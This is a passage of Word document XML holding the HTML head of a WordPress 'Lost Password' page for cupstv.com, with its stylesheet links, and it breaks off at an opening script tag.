        <w:t>&lt;!DOCTYPE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A215FC5" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>&lt;!--[if IE 8]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D63B440" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;html </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>xmlns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">="http://www.w3.org/1999/xhtml" class="ie8" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>lang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>-GB"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3506D11E" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>&lt;![</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>endif]--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61914BE1" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>&lt;!--[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>if !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(IE 8) ]&gt;&lt;!--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E18EABB" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;html </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>xmlns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">="http://www.w3.org/1999/xhtml" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>lang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>-GB"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF1C24E" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>&lt;!--&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>![</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>endif]--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B7F0EC" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A24542" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;meta http-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>equiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>="Content-Type" content="text/html; charset=UTF-8" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7447BF4D" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;title&gt;CUPSTV.COM &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>rsaquo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>; Lost Password&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F82F45D" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;link </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>rel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>='stylesheet' id='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>dashicons-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">'  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>='http://cupstv.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>wp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>-includes/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>/dashicons.min.css' type='text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>' media='all' /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE59CAD" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">&lt;link </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>rel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>='stylesheet' id='buttons-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">'  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>='http://cupstv.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>wp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>-includes/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>/buttons.min.css' type='text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>' media='all' /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB893A8" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;link </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>rel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>='stylesheet' id='forms-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">'  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>='http://cupstv.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>wp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>-admin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>/forms.min.css' type='text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>' media='all' /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600562B4" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;link </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>rel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>='stylesheet' id='l10n-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">css'  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>='http://cupstv.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>wp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>-admin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>/l10n.min.css' type='text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>' media='all' /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A888F4" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;link </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>rel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>='stylesheet' id='login-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">'  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>='http://cupstv.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>wp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>-admin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>/login.min.css' type='text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>' media='all' /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619AD241" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;link </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>rel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>dns-prefetch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>='//s.w.org' /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B80EABF" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>&lt;script type='text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBA60C6" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
